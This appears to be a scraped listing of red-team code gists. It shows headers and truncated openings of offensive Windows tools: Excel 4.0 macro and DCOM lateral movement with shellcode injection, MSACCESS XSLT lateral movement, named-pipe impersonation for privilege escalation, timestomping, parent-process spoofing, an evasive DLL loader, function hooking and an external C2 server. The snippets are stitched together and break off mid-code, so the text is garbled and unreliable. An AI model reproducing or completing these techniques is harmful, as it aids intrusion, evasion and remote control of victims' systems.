
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#
RedTeams / np_impersonate.c
Created July 21, 2019 18:57
Simple demonstration of Named pipe Impersonation
/*
* Great, this technique is overdone maybe...a billion times
* This same technique is used by Metasploit's getsystem()
* command in implementation 1 (getsystem -t 1) by forcing
* a service to connect to an arbitrary named pipe.
*
* The technique is abusable given the following conditions:
* -> SeImpersonatePrivilege _must_ be enabled, I cannot stress
* this enough. Read MSDN, to impersonate other users, you need
* this privilege for the call to complete successfully.
RedTeams / timestomp.c
Created July 21, 2019 18:57
Demonstrates "timestomping" using ntdll.dll functions.
// Demonstrates "timestomping" in C using Ntdll.Dll function calls.
// Authored by Austin Hudson (Mumbai).
// Can be compiled with mingw:
// x86_64-w64-mingw32-gcc timestomp.c -o timestomp.exe -lntdll
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winternl.h>
#include <ntstatus.h>
#include <stdio.h>
static int process_spoof(HANDLE ParentHandle, PCHAR ProcessName)
{
SIZE_T ThreadSize;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&si, sizeof(si));
InitializeProcThreadAttributeList(NULL, 1, 0, &ThreadSize);
si.lpAttributeList = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, ThreadSize));
/**
loader.c - Attempts to fully port LoadLibrary() to a position-independent
variant to facilitate the self-loading of a DLL and its
dependencies, as well as introduce evasive features to reduce
memory indicators.
Inspiration:
ZeroLoad - https://github.com/zerosum0x0/zeroload (zerosum0x0)
MemoryModule - https://github.com/fancycode/MemoryModule (fancycode)
RedTeams / hook.c
Created July 21, 2019 18:57
x86/x64 Simple JMP (Relative Offset) function hooking.
#include <windows.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#include <stdbool.h>
#if _WIN32 || _WIN64
#if _WIN64
typedef uint64_t uint_t;
#else
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{
RedTeams / extc2_server.c
Created July 21, 2019 18:58
External C2
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
struct s_config {